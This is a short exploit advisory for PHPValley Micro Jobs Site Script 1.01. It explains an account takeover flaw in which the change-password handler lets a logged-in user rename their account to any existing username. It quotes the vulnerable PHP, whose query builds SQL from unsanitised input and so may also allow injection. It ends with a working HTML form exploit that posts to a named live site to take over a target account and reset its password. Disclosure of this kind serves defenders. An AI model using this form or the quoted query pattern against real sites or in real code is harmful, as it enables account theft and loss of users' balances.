Author: Jason Whelan
PacketStorm: exploitdev
Email: exploitdevj@gmail.com

Target Software: PHPValley Micro Jobs Site Script 1.01
Vendor URL: http://phpvalley.com/
Demo: http://phpvalley.com/demo

Account Takeover Vulnerability

This vulnerability allows users to edit their username, which the script
doesn't account for. Editing your username to that of a current user allows
the attacker to takeover their account, including using or depositing their
balance.

The vulnerability exists in php/change_pass_content.php:
if (isset($_POST['changepass']))
{
$cpass=md5($_POST['cpass']);
$npass=trim($_POST['npass']);
$npassc=trim($_POST['npassc']);
$username=trim(strtolower($_POST['auser']));
if($npass == $npassc && !empty($npass)){
$query = "UPDATE members SET username='".$username."',
password='".md5(strtolower($npass))."' where
username='".$_SESSION['userName']."' and password='$cpass'";
 This code doesn't validate the username that is being updated. SQL
injection might also be possible, but the length is limited here.

Exploit:
<!-- be logged into your own account, edit info below: -->
<form method="post" action="http://webfiver.com/change_pass.php">
<input name="changepass" type="hidden" value="Update" />
Target Username: <input name="auser" type="text" />
Your Password:   <input name="cpass" type="password" />
 <input name="npass" type="hidden" value="jacked" />
 <input name="npassc" type="hidden" value="jacked" />
 <input type="submit" value="Jack" />
</form>